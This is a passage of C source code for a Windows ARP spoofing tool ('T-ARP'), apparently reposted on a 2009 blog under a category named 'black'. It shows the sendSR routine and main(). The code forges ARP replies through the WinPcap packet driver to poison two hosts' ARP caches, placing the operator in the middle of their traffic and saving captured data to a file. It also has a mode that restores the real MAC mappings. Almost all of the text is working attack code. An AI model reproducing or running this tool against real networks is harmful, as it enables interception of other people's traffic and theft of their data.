DWORD WINAPI sendSR(LPVOID no)
{
int fun=*(int *)no;
int j,k;
char sendbuf[1024];
struct sockaddr_in fsin,ssin;
BOOL stimes=FALSE;
ETHDR eth;
ARPHDR arp;
fsin.sin_addr.s_addr=htonl(firstip);
ssin.sin_addr.s_addr=htonl(secondip);
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);
if(fun==3)
{
if(mm)
{
if((firstip==myip) && (secondip==myip))
{
fm=TRUE;
sm=TRUE;
memcpy(fmac,mmac,6);
memcpy(smac,mmac,6);
}
else if(!fm || !sm)
{
printf("\nNot get enough data\n");
return -1;
}
for(j=0;j<2;j++)
{
if(j==0)
{
printf("\nSpoofing %.16s : ",inet_ntoa(fsin.sin_addr));
printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));
}
else if(j==1)
{
printf("Spoofing %.16s : ",inet_ntoa(ssin.sin_addr));
printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));
}
for(k=0;k<5;k++)
printf("%.2x-",mmac[k]);
printf("%.2x\n",mmac[5]);
}
printf("\ni will try to snoof ...\n\n");
stimes=TRUE;
}
else
{
printf("\nNot get enough data\n");
return -1;
}
}
else if(fun==4)
{
if(mm)
{
if((firstip==myip) && (secondip==myip))
{
fm=TRUE;
sm=TRUE;
memcpy(fmac,mmac,6);
memcpy(smac,mmac,6);
}
else if(!fm || !sm)
{
printf("\nNot get enough data\n");
return -1;
}
printf("\nReset %.16s : ",inet_ntoa(fsin.sin_addr));
printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));
for(k=0;k<5;k++)
printf("%.2x-",smac[k]);
printf("%.2x\n",smac[5]);
printf("Reset %.16s : ",inet_ntoa(ssin.sin_addr));
printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));
for(k=0;k<5;k++)
printf("%.2x-",fmac[k]);
printf("%.2x\n\n",fmac[5]);
stimes=FALSE;
}
else
{
printf("\nNot get enough data\n");
return -1;
}
}
else
return -1;
do
{
memcpy(eth.eh_dst,fmac,6);
memcpy(arp.arp_tha,fmac,6);
arp.arp_tpa=htonl(firstip);
arp.arp_spa=htonl(secondip);
if(!stimes)
{
memcpy(eth.eh_src,smac,6);
memcpy(arp.arp_sha,smac,6);
}
else
{
memcpy(eth.eh_src,mmac,6);
memcpy(arp.arp_sha,mmac,6);
}
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
if(PacketSetNumWrites(lpadapter,2)==FALSE)
{
printf("Warning: Unable to send a packet 2 times\n");
}
if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
{
printf("PacketSendPacket in SendSR Error: %d\n",GetLastError());
return -1;
}
Sleep(1000);
memcpy(eth.eh_dst,smac,6);
memcpy(arp.arp_tha,smac,6);
arp.arp_tpa=htonl(secondip);
arp.arp_spa=htonl(firstip);
if(!stimes)
{
memcpy(eth.eh_src,fmac,6);
memcpy(arp.arp_sha,fmac,6);
}
else
{
memcpy(eth.eh_src,mmac,6);
memcpy(arp.arp_sha,mmac,6);
}
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
{
printf("PacketSendPacket int sendSR Error: %d\n",GetLastError());
return -1;
}
Sleep(1000);
}while(stimes);
if(fun==4)
printf("Reset Successfully");
return 0;
}
int main(int argc,char *argv[])
{
HANDLE sthread,rthread;
WCHAR adaptername[8192];
WCHAR *name1,*name2;
ULONG adapterlength;
DWORD threadsid,threadrid;
struct NetType ntype;
struct bpf_stat stat;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum=0,opti=0,open,i,total;
long npflen;
system("cls.exe");
start();
if(argc!=4)
{
usage();
getche();
return -1;
}
else
{
if(!strcmp(argv[1],"-m"))
{
opti=1;
}
else if(!strcmp(argv[1],"-a"))
{
opti=2;
}
else if(!strcmp(argv[1],"-s"))
{
opti=3;
if((fp=fopen("capture.txt","w+"))==NULL)
{
printf("Open capture.txt Error: %d\n");
return -1;
}
else
{
fwrite("T-ARP Captrue Data",20,1,fp);
}
}
else if(!strcmp(argv[1],"-r"))
{
opti=4;
}
else
{
usage();
getche();
return -1;
}
}
firstip=ntohl(inet_addr(argv[2]));
secondip=ntohl(inet_addr(argv[3]));
total=secondip-firstip+1;
printf("\nLibarary Version: %s",PacketGetVersion());
adapterlength=sizeof(adaptername);
if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE)
{
printf("PacketGetAdapterNames Error: %d\n",GetLastError());
return -1;
}
name1=adaptername;
name2=adaptername;
i=0;
while((*name1!='\0') || (*(name1-1)!='\0'))
{
if(*name1=='\0')
{
memcpy(adapterlist[i],name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
adapternum=i;
printf("\nAdapters Installed:\n");
for(i=0;i<adapternum;i++)
wprintf(L"%d - %s\n",i+1,adapterlist[i]);
do
{
printf("\nSelect the number of the adapter to open: ");
scanf("%d",&open);
if(open>=1 && open<=adapternum)
break;
}while(open<1 || open>adapternum);
lpadapter=PacketOpenAdapter(adapterlist[open-1]);
if(!lpadapter || (lpadapter->hFile==INVALID_HANDLE_VALUE))
{
printf("PacketOpenAdapter Error: %d\n",GetLastError());
return -1;
}
if(PacketGetNetType(lpadapter,&ntype))
{
printf("\n\t\t*** Host Information ***\n");
printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);
}
npflen=sizeof(ipbuff);
if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
{
sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));
sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));
sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
myip=ntohl(sin.sin_addr.s_addr);
printf("[MACAddress:]");
}
else
{
printf("\nNot get enough data\n");
PacketFreePacket(lppackets);
PacketCloseAdapter(lpadapter);
return -1;
}
if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %d\n",GetLastError());
return -1;
}
rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);
Sleep(300);
if(getmine())
{
PacketFreePacket(lppackets);
PacketFreePacket(lppacketr);
PacketCloseAdapter(lpadapter);
return -1;
}
Sleep(300);
if((opti==1) || (opti==2))
{
for(i=0;i<total;i++)
{
sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
Sleep(30);
}
Sleep(1000);
}
else if((opti==3) || (opti==4))
{
sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
Sleep(300);
CloseHandle(sthread);
sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);
}
WaitForSingleObject(sthread,INFINITE);
CloseHandle(sthread);
CloseHandle(rthread);
if(PacketGetStats(lpadapter,&stat)==FALSE)
{
printf("Warning: Unable to get the adapter stat\n");
}
else
{
printf("\n\n%d packets received, %d packets lost !\n",stat.bs_recv,stat.bs_drop);
}
PacketFreePacket(lppackets);
PacketFreePacket(lppacketr);
PacketCloseAdapter(lpadapter);
return 0;
}
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=208891
posted on 2009-03-10 08:07
冰火 阅读(317)
评论(0) 编辑 收藏 引用 所属分类:
black